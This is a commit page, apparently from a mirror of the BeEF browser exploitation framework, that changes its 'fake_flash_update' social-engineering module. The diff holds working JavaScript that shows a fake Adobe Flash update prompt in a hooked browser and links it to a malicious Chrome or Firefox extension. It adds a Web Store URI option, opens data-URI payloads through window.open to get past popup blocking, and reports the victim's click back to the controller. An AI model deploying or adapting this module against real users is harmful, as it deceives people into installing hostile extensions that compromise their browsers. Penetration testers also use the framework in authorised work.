Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added GoogleWebStore module.rb option. Modified link opener to support data URI injections.

Browse Source
This commit is contained in:
antisnatchor
2013-03-12 10:57:07 +00:00
parent 713a20f157
commit de1de356f7
2 changed files with 7 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
modules/social_engineering/fake_flash_update/command.js
View File

@@ -10,13 +10,13 @@ beef.execute(function() {
var image = "<%== @image %>"; var image = "<%== @image %>";
var payload_type = "<%== @payload %>"; var payload_type = "<%== @payload %>";
var payload_root = "<%== @payload_root %>"; var payload_root = "<%== @payload_root %>";
var chrome_store_uri = "<%== @chrome_store_uri %>";
var chrome_extension = "/demos/adobe_flash_update.crx";
var firefox_extension = "/api/ipec/ff_extension"; var firefox_extension = "/api/ipec/ff_extension";
var payload = ""; var payload = "";
switch (payload_type) { switch (payload_type) {
case "Chrome_Extension": case "Chrome_Extension":
payload = payload_root + chrome_extension; payload = chrome_store_uri;
break; break;
case "Firefox_Extension": case "Firefox_Extension":
payload = payload_root + firefox_extension; payload = payload_root + firefox_extension;
@@ -32,7 +32,9 @@ beef.execute(function() {
div.setAttribute('style', 'position:absolute; top:30%; left:40%;'); div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center'); div.setAttribute('align', 'center');
document.body.appendChild(div); document.body.appendChild(div);
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>'; // window.open is very useful when using data URI vectors and the IFrame/Object tag
// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
div.innerHTML= "<a href=\"javascript:window.open('" + payload + "')\"><img src=\"" + image + "\" /></a>";
$j("#splash").click(function () { $j("#splash").click(function () {
$j(this).hide(); $j(this).hide();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');

2
modules/social_engineering/fake_flash_update/module.rb
View File

@@ -13,11 +13,11 @@ class Fake_flash_update < BeEF::Core::Command
return [ return [
{'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}, {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
{'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root}, {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
{'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']], 'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
} }
] ]
end end